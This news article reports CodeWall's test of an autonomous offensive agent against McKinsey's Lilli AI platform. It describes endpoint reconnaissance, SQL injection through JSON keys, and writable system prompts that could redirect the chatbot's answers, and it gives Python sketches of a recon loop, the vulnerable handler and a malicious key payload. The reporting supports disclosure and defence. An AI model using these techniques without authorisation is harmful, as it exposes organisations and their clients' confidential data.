A security test conducted by the cybersecurity startup CodeWall demonstrates just how quickly autonomous AI systems can now identify security vulnerabilities in complex platforms. The researchers deployed a purpose-built offensive agent against Lilli, the internal generative AI platform of the consulting firm McKinsey. Without human assistance, the system managed to gain access to central databases within about two hours, thereby uncovering a critical security vulnerability.
According to CodeWall, the attack started without any login credentials or insider knowledge. The autonomous agent began its analysis with publicly available technical documentation and identified several API endpoints referenced in it that were reachable from the internet. Some of these interfaces were apparently not sufficiently protected. In total, the agent found nearly two dozen such endpoints through which requests could be sent to the system.
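CodeWall has not published its tooling, but the reconnaissance phase described here boils down to checking documented endpoints for missing authentication. A minimal sketch of that idea in Python, with a purely illustrative host and hypothetical paths:

```python
import requests

# Illustrative only: the real host and endpoint paths are not public.
BASE_URL = "https://lilli.example.internal"
DOCUMENTED_PATHS = ["/api/search", "/api/documents", "/api/prompts"]

for path in DOCUMENTED_PATHS:
    # An endpoint that answers with anything other than 401/403
    # is a candidate for unauthenticated access.
    resp = requests.get(BASE_URL + path, timeout=10)
    if resp.status_code not in (401, 403):
        print(f"{path} reachable without credentials (HTTP {resp.status_code})")
```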
Particularly problematic was a search endpoint, whose structure the agent examined more closely. In doing so, the system determined that field names from JSON requests were being incorporated unfiltered into database queries. This unusual implementation meant that it was not the content of the request but the names of its fields that were potentially vulnerable. The AI agent detected this anomaly based on error messages in which the JSON keys appeared directly.
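CodeWall has not released the vulnerable code, but the flaw it describes matches a well-known anti-pattern: parameterizing the values of a JSON request while splicing its keys straight into the SQL text. A minimal sketch of that pattern, with all names hypothetical and SQLite standing in for the real database:

```python
import json
import sqlite3  # stand-in for the platform's actual database driver

def search(request_body: str, conn: sqlite3.Connection):
    filters = json.loads(request_body)

    # The values go through placeholders, but the JSON *keys* are pasted
    # into the query string unvalidated -- the structure of the request,
    # not its content, becomes the attack surface.
    where = " AND ".join(f"{field} = ?" for field in filters)
    sql = f"SELECT id, title FROM documents WHERE {where}"

    # A malformed key produces a database error that echoes the key back,
    # which is the kind of signal the agent reportedly picked up on.
    return conn.execute(sql, list(filters.values())).fetchall()
```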
Based on this, the agent carried out an SQL injection attack. According to CodeWall, this vulnerability would likely have been overlooked by traditional automated security scanners, as the attack vector lay not in the transmitted values but in the structure of the data fields. The autonomous agent, however, was able to identify this peculiarity and exploit it specifically.
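Against a handler like the sketch above, the injection rides in the field name rather than the value, which is why scanners that only fuzz values tend to miss it. A purely illustrative payload (not CodeWall's actual request):

```python
import json

# Benign request: key and value are both harmless.
benign = json.dumps({"title": "quarterly report"})

# Malicious request: the value is harmless, but the key smuggles SQL.
# With the vulnerable handler sketched earlier, the WHERE clause becomes
#   1=1 OR title = ?
# so every row in the table matches.
malicious = json.dumps({"1=1 OR title": "anything"})
```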
Within two hours, the researchers report, the system gained full read and write access to the platform's production database. According to CodeWall, this database contained approximately 46.5 million chat messages in plain text, covering topics such as strategic business decisions, mergers and acquisitions, and internal project work with clients.
In addition to the chat data, the agent also found large amounts of other sensitive information. This included approximately 728,000 files containing confidential customer data, about 57,000 user accounts, and 95 so-called system prompts. These prompts control the AI’s behavior and define how the chatbot generates responses. According to CodeWall, a particularly critical issue was that these system prompts could also be altered. An attacker could theoretically have used this to manipulate all of the chatbot’s responses.
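System prompts are the hidden instructions prepended to every conversation, and they are typically loaded from storage at request time. If an attacker with write access rewrites that stored text, every subsequent answer is generated under the attacker's instructions. A minimal sketch of the pattern, with hypothetical table and column names:

```python
import sqlite3

def build_messages(conn: sqlite3.Connection, user_input: str) -> list[dict]:
    # The system prompt is read from the same database the agent could write to,
    # so silently editing this row would redirect every future response.
    (system_prompt,) = conn.execute(
        "SELECT content FROM system_prompts WHERE name = 'default'"
    ).fetchone()
    return [
        {"role": "system", "content": system_prompt},
        {"role": "user", "content": user_input},
    ]
```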
The generative AI platform Lilli was introduced by McKinsey in the summer of 2023. It serves as a research and analysis tool for consultants within the company and, according to the company, is now used by more than 40,000 employees. Among other things, the platform supports strategic analyses, the evaluation of internal information, and the preparation of client projects.
After CodeWall reported the discovered vulnerabilities in early March, McKinsey stated that it responded quickly. The company explained that the affected interfaces had been closed within a few hours. A spokesperson also emphasized that an internal investigation was conducted in collaboration with an external forensic security firm.
According to the company, this investigation found no evidence that customer data had actually been accessed by the researchers or by other unauthorized third parties. The company added that the protection of sensitive information is a top priority for McKinsey.
For CodeWall CEO Paul Price, however, the incident is a clear warning sign for companies operating their own AI systems. The offensive agent used in the test selected its target and identified a complex security vulnerability entirely without human guidance, and such tools could also be used by criminal groups in the future.
With the increasing prevalence of generative AI systems, the likelihood that automated attack software will specifically search for vulnerabilities is also rising. Autonomous agents can analyze large amounts of documentation, observe system behavior, and identify potential points of attack much faster than human security teams. Companies must therefore prepare for the fact that attacks will increasingly be carried out by AI-powered systems in the future.
The CodeWall test demonstrates just how capable autonomous AI agents have already become in identifying security vulnerabilities. Within a short period of time, the system was able to identify a complex vulnerability and gain extensive access to a central corporate platform. Even though McKinsey reports that it did not detect any data breaches, the incident highlights the growing risk of automated cyberattacks. Companies that use generative AI systems must therefore increasingly secure their security architecture against AI-powered attackers as well.